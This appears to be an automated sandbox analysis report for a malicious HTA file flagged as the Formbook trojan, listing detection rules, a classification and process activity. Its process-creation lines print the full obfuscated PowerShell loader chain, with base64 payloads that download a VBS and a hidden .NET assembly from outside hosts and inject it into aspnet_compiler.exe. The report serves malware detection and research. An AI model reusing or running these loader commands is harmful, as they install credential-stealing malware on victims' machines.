Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F20770	11_2_00F20770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F44750	11_2_00F44750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F4E8F0	11_2_00F4E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F238E0	11_2_00F238E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F22840	11_2_00F22840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F2A840	11_2_00F2A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F8D800	11_2_00F8D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F229A0	11_2_00F229A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FEA9A6	11_2_00FEA9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F25990	11_2_00F25990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F36962	11_2_00F36962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F29950	11_2_00F29950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F3B950	11_2_00F3B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FCDAC6	11_2_00FCDAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F65AA0	11_2_00F65AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FBDAAC	11_2_00FBDAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F1EA80	11_2_00F1EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F93A6C	11_2_00F93A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FDFA49	11_2_00FDFA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FD7A46	11_2_00FD7A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F5DBF9	11_2_00F5DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FD6BD7	11_2_00FD6BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F3FB80	11_2_00F3FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FDFB76	11_2_00FDFB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FDAB40	11_2_00FDAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F10CF2	11_2_00F10CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FDFCF2	11_2_00FDFCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FC0CB5	11_2_00FC0CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F99C32	11_2_00F99C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F20C00	11_2_00F20C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F1ADE0	11_2_00F1ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F28DC0	11_2_00F28DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F3FDC0	11_2_00F3FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F38DBF	11_2_00F38DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FD7D73	11_2_00FD7D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FD1D5A	11_2_00FD1D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F23D40	11_2_00F23D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F2AD00	11_2_00F2AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FDEEDB	11_2_00FDEEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F25EC0	11_2_00F25EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F29EB0	11_2_00F29EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F32E90	11_2_00F32E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FDCE93	11_2_00FDCE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F20E59	11_2_00F20E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FDEE26	11_2_00FDEE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F2CFE0	11_2_00F2CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F12FC8	11_2_00F12FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FDFFB1	11_2_00FDFFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F21F92	11_2_00F21F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F94F40	11_2_00F94F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F40F30	11_2_00F40F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F62F28	11_2_00F62F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FDFF09	11_2_00FDFF09

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00F67E54 appears 89 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00F0B970 appears 268 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00F8EA12 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00F9F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00F55130 appears 36 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 2079
Source: C:\Windows\SysWOW64\cmd.exe	Process created: Commandline size = 2046
Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 2079	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: Commandline size = 2046	Jump to behavior

Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.2534332351.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.2535434593.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 6084, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.phis.troj.expl.evad.winHTA@18/16@2/3

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\createdbestthingswithenergylevelgoodforbusinesspuropse[1].tiff

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2452:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_01hknfet.vve.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithenergylevelgoodforbusiness.vbS"

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: createdbetterthingswithgreatnressgivenmebackwithnice.hta	Virustotal: Detection: 31%
Source: createdbetterthingswithgreatnressgivenmebackwithnice.hta	ReversingLabs: Detection: 15%

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\createdbetterthingswithgreatnressgivenmebackwithnice.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD327.tmp" "c:\Users\user\AppData\Local\Temp\zl2mzrqp\CSC28505E0AE9E8489AA3B119DACC3AAED2.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithenergylevelgoodforbusiness.vbS"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cyclooctadiene = 'JGhpY2N1cHBpbmcgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcHJpbXBpbmcgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtb3ZpbmdzID0gJHByaW1waW5nLkRvd25sb2FkRGF0YSgkaGljY3VwcGluZyk7JGFuc2VyZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkbW92aW5ncyk7JGZsdXR0ZXJieSA9ICc8PEJBU0U2NF9TVEFSVD4+JzskaGFta2luID0gJzw8QkFTRTY0X0VORD4+JzskdW5ncmlldmluZyA9ICRhbnNlcmVzLkluZGV4T2YoJGZsdXR0ZXJieSk7JGNvbnRyYXZlbmVyID0gJGFuc2VyZXMuSW5kZXhPZigkaGFta2luKTskdW5ncmlldmluZyAtZ2UgMCAtYW5kICRjb250cmF2ZW5lciAtZ3QgJHVuZ3JpZXZpbmc7JHVuZ3JpZXZpbmcgKz0gJGZsdXR0ZXJieS5MZW5ndGg7JHNub3dtb2JpbGUgPSAkY29udHJhdmVuZXIgLSAkdW5ncmlldmluZzskd2hvcnRsZSA9ICRhbnNlcmVzLlN1YnN0cmluZygkdW5ncmlldmluZywgJHNub3dtb2JpbGUpOyRyZXZlYWxlZCA9IC1qb2luICgkd2hvcnRsZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkd2hvcnRsZS5MZW5ndGgpXTskbWFza2luZyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHJldmVhbGVkKTskdHJhbnNvY2VhbmljID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWFza2luZyk7JFRoYXRjaGVyaXNlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JFRoYXRjaGVyaXNlLkludm9rZSgkbnVsbCwgQCgnMC8xTDJ0ZS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnYXNwbmV0X2NvbXBpbGVyJywgJyR0aG9tc29uaWFuaXNtJywgJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJzEnLCckdGhvbXNvbmlhbmlzbScsJycpKTs=';$italicizing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($cyclooctadiene));Invoke-Expression $italicizing
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))"	Jump to behavior
